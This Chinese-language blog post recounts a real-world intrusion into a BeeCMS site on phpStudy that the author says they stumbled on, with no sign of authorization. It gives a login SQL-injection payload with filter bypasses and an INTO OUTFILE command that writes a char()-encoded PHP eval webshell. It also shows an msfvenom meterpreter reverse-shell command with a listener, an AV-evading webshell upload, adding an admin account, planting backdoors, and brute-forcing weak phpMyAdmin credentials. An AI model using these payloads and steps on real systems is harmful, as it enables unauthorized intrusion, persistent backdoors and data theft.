記錄某一次無(wú)意點(diǎn)開(kāi)的一個(gè)小網(wǎng)站的滲透過(guò)程，幸運(yùn)的是搭建平臺(tái)是phpstudy，cms是beecms，beecms有通用漏洞，然后去網(wǎng)上找了資料，成功getshell并獲取服務(wù)器權(quán)限。

一、滲透過(guò)程

無(wú)意點(diǎn)開(kāi)一個(gè)網(wǎng)站，發(fā)現(xiàn)網(wǎng)站比較小，且看起來(lái)比較老，然后發(fā)現(xiàn)logo沒(méi)有改，于是乎去百度搜索這個(gè)cms，發(fā)現(xiàn)有通用漏洞，Beecms 通用漏洞

這里運(yùn)氣比較好，沒(méi)有更改后臺(tái)地址，還是默認(rèn)地址/admin/login.php

通過(guò)通用漏洞發(fā)先后臺(tái)管理處存在sql注入漏洞，直接輸入admin’，然后就會(huì)報(bào)錯(cuò)，這里用萬(wàn)能密碼不能登陸，看來(lái)還是得通過(guò)上面得通用漏洞來(lái)進(jìn)行注入

可以看到輸入payload后，頁(yè)面返回正常，從而可以判斷有sql注入，這里采用雙寫(xiě)進(jìn)行繞過(guò)

發(fā)現(xiàn)這個(gè)注入點(diǎn)后，就有各種各樣的注入方式了，通過(guò)sql語(yǔ)句寫(xiě)入一句話(huà)，sqlmap一把梭，手工注入得到賬號(hào)密碼等等，怎么方便怎么來(lái),這里我把幾種方法都寫(xiě)一下，看看那種方法可以

方法一

1.通過(guò)post抓包sqlmap一把梭，dump出管理員賬號(hào)密碼，進(jìn)后臺(tái)找上傳點(diǎn)

2.一把梭，發(fā)現(xiàn)并沒(méi)有，使用腳本也沒(méi)有繞過(guò)

方法二

1.通過(guò)burp抓包，寫(xiě)入一句話(huà)，payload：admin%27 un union ion selselectect 1,2,3,4, into outfile 'xm.php'#，發(fā)現(xiàn)寫(xiě)入失敗，前面講到有防護(hù)，這里通過(guò)hex編碼或者char函數(shù)繞過(guò)

2.對(duì)shell部分進(jìn)行編碼

3.寫(xiě)入shell的payload為:注意:記得在編碼轉(zhuǎn)換的時(shí)候前面加0x或者直接用unhex函數(shù),但是本次實(shí)驗(yàn)用unhex函數(shù)一直失敗,所以在前面加0x，看到可以寫(xiě)入成功。

ps:這里的寫(xiě)入路徑純屬盲猜，運(yùn)氣好，默認(rèn)目錄

4.用蟻劍連接,成功連接，至此getshell完畢，下來(lái)就是后滲透階段，后面會(huì)講

char函數(shù)繞過(guò):mysql內(nèi)置函數(shù)char()可以將里面的ascii碼轉(zhuǎn)換為字符串，payload為:admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#

一樣成功寫(xiě)入

1.寫(xiě)入成功后，菜刀可以連接，我們?cè)L問(wèn)寫(xiě)入的文件，驚奇的發(fā)現(xiàn)竟然有admin，和一串md5碼，大膽猜測(cè)可能是后臺(tái)賬號(hào)和密碼，試一下

2.md5解密，wocao，成功登陸，然后就是后臺(tái)找上傳了

二、后滲透

通過(guò)whoami查看權(quán)限，發(fā)現(xiàn)是admin權(quán)限，但是不是最高權(quán)限，我們要提到最高權(quán)限去

方法一

1.通過(guò)msf生成木馬提權(quán)，payload:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe

2.通過(guò)蟻劍上傳木馬，并執(zhí)行。執(zhí)行之前打開(kāi)msf使用模塊use exploit/multi/handler，設(shè)置相應(yīng)參數(shù)，然后開(kāi)始監(jiān)聽(tīng)

3.不知道什么問(wèn)題，用這個(gè)沒(méi)有成功，那么只能通過(guò)大馬提權(quán)了

方法二

1.上傳大馬，此處應(yīng)該有狗或者盾之類(lèi)的，用的免殺，成功上傳

2.訪(fǎng)問(wèn)大馬

3.這里提權(quán)方式很多，就不細(xì)說(shuō)了,有大馬之后很多操作都可以引刃而解了，開(kāi)放端口，添加賬號(hào)，留后門(mén)。。等等

4.創(chuàng)建admin權(quán)限賬號(hào)之后，登陸服務(wù)器

三、一些其他的發(fā)現(xiàn)

通過(guò)掃描目錄，還發(fā)現(xiàn)有phpmyadmin，可以爆破，這里我試了下竟然是弱口令，都是root，但是連接不上，只能通過(guò)phpmyadmin登陸，發(fā)現(xiàn)是低版本的phpstudy搭建的，這里就可以另一種思路，利用日志文件寫(xiě)入一句話(huà)getshell

四、總結(jié) 1.前臺(tái)sql注入獲取用戶(hù)名密碼，進(jìn)入后臺(tái)找上傳 2.SQL注入語(yǔ)句寫(xiě)入一句話(huà) 3.phpmyadmin一句話(huà)getshell 4.上傳大馬提權(quán)

至此，滲透結(jié)束。

審核編輯：劉清